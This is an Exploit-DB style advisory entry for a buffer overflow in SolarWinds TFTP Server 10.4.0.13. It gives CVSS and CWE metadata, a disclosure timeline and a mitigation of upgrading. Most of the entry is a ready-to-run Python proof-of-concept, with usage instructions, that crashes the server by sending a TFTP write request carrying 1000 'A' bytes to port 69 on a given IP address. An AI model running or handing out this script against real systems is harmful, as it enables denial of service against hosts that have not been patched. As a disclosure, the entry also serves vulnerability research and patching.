Solarwinds TFTP Server Ver. 10.4.0.13

vendor:

TFTP Server

by:

Elliott "Nullthreat" Cutright

8,8

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: TFTP Server

Affected Version From: 10.4.0.13

Affected Version To: 10.4.0.13

Patch Exists: YES

Related CWE: N/A

CPE: a:solarwinds:tftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

Solarwinds TFTP Server Ver. 10.4.0.13

An long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.

Mitigation:

Upgrade to the latest version of SolarWinds TFTP Server

Source

Exploit-DB raw data:

#!/usr/bin/python
print "\n############################################################"
print "##	Nullthreat Network"
print "##	Solarwinds TFTP Server Ver. 10.4.0.13"
print "##	Elliott \"Nullthreat\" Cutright"
print "##	nullthreat@nullthreat.net"
print "############################################################"
print "\n"
# Summary: An long Write Request (1000 A's) will cause SolarWinds TFTP Server to crash.
# Tested on: Windows XP SP3
# Usage: ./solarwindscrash.py <IPADDRESS>
# Note: It can take the application a few moments to crash, be patiant.
# Shouts: #SEUnited, Corelan Team

# Discovered: June 6th 2010
# Vendor Notified: June 9th 2010
# Patch Released: June 11th 2010

import socket
import sys

host = sys.argv[1]
port = 69
addr = (host,port)

s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)

print "[*] Building Crash"
crash = "\x41" * 1000
request = "\x00\x02" + crash + "\x00" + "NETASCII" + "\x00"

print "[*] Sending Crash"
s.sendto(request, addr)

print "[*] Crash Sent, It can take some time for the app to crash"